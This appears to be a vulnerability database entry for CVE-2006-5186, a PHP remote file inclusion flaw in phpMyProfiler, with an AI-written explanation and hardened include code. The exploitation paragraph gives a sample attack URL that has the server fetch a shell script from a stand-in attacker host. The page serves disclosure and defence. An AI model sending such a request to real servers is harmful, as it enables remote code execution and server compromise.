VYPR
Unrated severity · NVD Advisory · Published Oct 10, 2006 · Updated Apr 23, 2026

CVE-2006-5186

Description

PHP remote file inclusion in phpMyProfiler 0.9.6 and earlier via the pmp_rel_path parameter, allowing arbitrary code execution when register_globals is enabled.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

A PHP remote file inclusion vulnerability exists in functions.php of phpMyProfiler 0.9.6 and earlier. The application passes the $pmp_rel_path variable to a require_once() call without sanitizing it. When the PHP configuration directive register_globals is enabled, every request parameter is exposed as a global variable of the same name, so an attacker can supply a remote URL in the pmp_rel_path request parameter and the server will include and execute arbitrary PHP code fetched from that remote location [1][2].

Exploitation

An attacker needs only network access to the vulnerable server and the ability to craft an HTTP request. No authentication is required. The exploitation step is straightforward: send a GET or POST request to functions.php with the pmp_rel_path parameter set to a URL pointing to an attacker-controlled PHP script (e.g., http://site.com/[path]/functions.php?pmp_rel_path=http://evil.com/shell.txt). The server will include and execute the remote code [2].

Impact

Successful exploitation allows remote attackers to execute arbitrary PHP code on the target server. This results in complete compromise of the confidentiality, integrity, and availability of the application and potentially the underlying server, depending on the permissions of the web server process. The attacker can read, write, or delete files, execute system commands, access databases, and pivot to other systems on the same network.

Mitigation

No official patch has been released for this vulnerability; it affects phpMyProfiler 0.9.6 and earlier. The primary mitigation is to disable register_globals in php.ini (register_globals = Off). Additionally, users should upgrade to a later version if one is available, or remove the application entirely if it is unsupported. This CVE is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog.
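The following PHP is an added illustration of the fix pattern and is not phpMyProfiler's own code. The advisory only says that functions.php hands $pmp_rel_path to require_once() unsanitized; the commented-out vulnerable line is a reconstruction of that shape, and the names PMP_ROOT, pmp_safe_include_path(), the includes/ directory and config.php are assumptions chosen for the example. The hardened version never lets request data choose the included file, confines the resolved path to the application root, and relies on php.ini settings that block remote includes regardless of application code (register_globals was removed entirely in PHP 5.4; allow_url_include exists from PHP 5.2).

```php
<?php
// Added example (not phpMyProfiler code): vulnerable include pattern vs. hardened form.

// --- Vulnerable shape, reconstructed from the advisory (do not use) ---
// With register_globals = On, a request parameter named pmp_rel_path becomes
// the global $pmp_rel_path before this line runs, so the include target is
// attacker-controlled and may be a remote URL:
//
//   require_once($pmp_rel_path . 'config.php');

// --- Hardened shape ---
// php.ini settings assumed for the deployment (block RFI at the interpreter level):
//   register_globals  = Off   ; request data must not become global variables
//   allow_url_fopen   = Off   ; no http:// ftp:// wrappers in file functions
//   allow_url_include = Off   ; no URL wrappers in include/require (PHP >= 5.2)

define('PMP_ROOT', realpath(__DIR__));   // application root, fixed at deploy time (assumed name)

/**
 * Resolve $relative underneath PMP_ROOT and return its absolute path, or null
 * when it names a URL, escapes the root, or is not an existing regular file.
 */
function pmp_safe_include_path(string $relative): ?string
{
    // Reject anything with a scheme prefix (http:, ftp:, php:, data:, ...).
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $relative)) {
        return null;
    }
    $candidate = realpath(PMP_ROOT . DIRECTORY_SEPARATOR . $relative);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // realpath() has already collapsed any ../ segments, so a prefix check
    // is enough to confirm the file lives inside the application root.
    $prefix = PMP_ROOT . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// The application, not the request, decides the relative path.
$pmp_rel_path = 'includes/';   // assumed directory name
$configPath = pmp_safe_include_path($pmp_rel_path . 'config.php');
if ($configPath === null) {
    http_response_code(500);
    exit('configuration file missing or outside application root');
}
require_once $configPath;
```

The scheme check is a defence-in-depth measure: with allow_url_include = Off the interpreter would refuse a URL anyway, but the function also fails closed on a misconfigured server, and the realpath() prefix test stops the local-file variant (../ traversal) that disabling remote wrappers alone does not address.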

AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

  • cpe:2.3:a:phpmyprofiler:phpmyprofiler:*:*:*:*:*:*:*:* (range: <=0.9.6)
  • (no CPE) (range: <=0.9.6)

Patches

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

News mentions

No linked articles in our index yet.